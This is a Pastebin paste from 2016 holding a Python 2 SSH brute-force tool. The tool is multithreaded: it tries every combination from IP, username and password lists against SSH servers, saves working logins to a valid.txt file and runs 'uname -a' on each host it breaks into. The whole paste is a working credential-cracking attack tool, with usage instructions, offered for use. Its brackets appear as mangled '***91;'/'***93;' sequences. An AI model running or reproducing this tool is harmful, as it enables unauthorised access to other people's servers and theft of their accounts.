Guest User

Untitled

a guest
Aug 25th, 2016
294
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import paramiko, sys, Queue, threading
  2.  
  3. class SSHBrute(threading.Thread):
  4. def __init__(self, queue):
  5. threading.Thread.__init__(self)
  6. self.queue = queue
  7. def run(self):
  8. while True:
  9. ip,user,passwd = self.queue.get()
  10. self.kraken(ip,user,passwd)
  11. self.queue.task_done()
  12.  
  13. def kraken(self,ip,user,passwd):
  14. try:
  15. if ip in cracked: return False
  16.  
  17. if '%user%' in str(passwd):
  18. passwd = passwd.split("%")***91;0***93; + user + passwd.split("%")***91;2***93;
  19. if '%User%' in str(passwd):
  20. pwd = user + passwd.split("%")***91;2***93;
  21. passwd = passwd.split("%")***91;0***93;+pwd.title()
  22. if str(passwd) == '%null%':
  23. passwd = ''
  24.  
  25. ssh = paramiko.SSHClient()
  26. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  27. ssh.connect(ip, username=user, password=passwd, timeout=35)
  28. raw.write(ip+' '+user+' '+passwd+'\n')
  29. raw.flush()
  30. chan = ssh.get_transport().open_session()
  31. chan.settimeout(35)
  32. chan.exec_command('uname -a')
  33. data = chan.recv(1024)
  34.  
  35. if len(data) == 0:
  36. nologs.write(ip+' '+user+' '+passwd+'\n')
  37. nologs.flush()
  38. return False
  39.  
  40. val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n')
  41. val.flush()
  42. cracked.append(ip)
  43. chan.close()
  44. ssh.close()
  45. return True
  46. except Exception, e:
  47. if 'uthent' in str(e):
  48. if dbg == 'bad':
  49. bad.write(ip+'\n')
  50. bad.flush()
  51. #print '\r***91;+***93;Tried '+ip+' '+user+' '+passwd+' '
  52. ssh.close()
  53. return False
  54. #print ip, str(e)
  55. ssh.close()
  56. return False
  57.  
  58. def brutemain():
  59. if len(sys.argv) < 2:
  60. print """
  61. SSH Brute Force Tool
  62. Author: @Elohim ***91;RST***93;
  63. Usage:
  64. bruter ThreadNumber IpFile UserFile PassFile FilterSwitch*
  65. *The filter Switch Takes Either the word "bad" or "no".
  66. If you supply the word bad, it filters in bad.txt only the ips
  67. which indeed support ssh AUTH and password didn't work"""
  68. return False
  69. ThreadNR = int(sys.argv***91;1***93;)
  70. queue = Queue.Queue(maxsize=20000)
  71. try:
  72. i = 0
  73. for i in range(ThreadNR):
  74. t = SSHBrute(queue)
  75. t.daemon = True
  76. t.start()
  77. i += 1
  78. except Exception, e:
  79. print 'Cant start more than',i,'Threads!'
  80.  
  81. global bad
  82. global val
  83. global nologs
  84. global cracked
  85. global raw
  86. cracked = ***91;***93;
  87. bad = open('bad.txt','w')
  88. val = open('valid.txt','a')
  89. nologs = open('nologins.txt','a')
  90. raw = open('raw.txt','a')
  91. with open(str(sys.argv***91;2***93;),'rU') as ipf: ips = ipf.read().splitlines()
  92. with open(str(sys.argv***91;3***93;),'rU') as uf: users = uf.read().splitlines()
  93. with open(str(sys.argv***91;4***93;),'rU') as pf: passwords = pf.read().splitlines()
  94. global dbg
  95. dbg = str(sys.argv***91;5***93;)
  96.  
  97. try:
  98. for password in passwords:
  99. for user in users:
  100. for ip in ips:
  101. queue.put((ip,user,password))
  102. except:
  103. pass
  104.  
  105. queue.join()
  106.  
  107. if __name__ == "__main__":
  108. brutemain()
RAW Paste Data